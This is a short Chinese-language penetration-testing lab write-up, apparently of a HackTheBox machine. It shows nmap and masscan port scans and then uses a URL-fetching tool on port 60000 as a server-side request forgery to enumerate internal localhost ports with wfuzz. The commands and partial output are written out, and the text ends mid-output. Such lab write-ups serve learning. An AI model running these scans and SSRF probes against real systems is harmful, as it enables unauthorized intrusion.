1扫描搜集
普通nmap -A 扫。8009打不开,8080是汤姆猫,但是没密码。
没有多少价值信息,很可能端口扫描不全,于是速度版全端口再扫
masscan -p1-65535,U:1-65535 10.10.10.55 --rate=1000 -e tun0
多出来60000.进这个端口看,是个读任意http网页的搜索框工具。
dirbuster扫60000下的目录,看到有server status
通过搜索框,查看自己网站的server status
127.0.0.1:60000/server-status
发现靶机有不对外的888端口运行。这里也学到了思路,以后渗透多想想,是否有不对外的端口?
或者用wfuzz检查可能的不对外端口 。 --h1=2是后来加上去用来屏蔽无效结果的。发现不对外的还有好几个。一个个点进去看。
不过似乎就888有料。可以看到有backup备份资料。
C:\root> wfuzz -c -z range,1-65535 --hl=2 http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ
Total requests: 65535
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000022: 200 4 L 4 W 62 Ch "22"
000000090: 200 11 L 18 W 156 Ch "90"
000000110: 200 17 L 24 W 187 Ch "110"
000000200: 200 3 L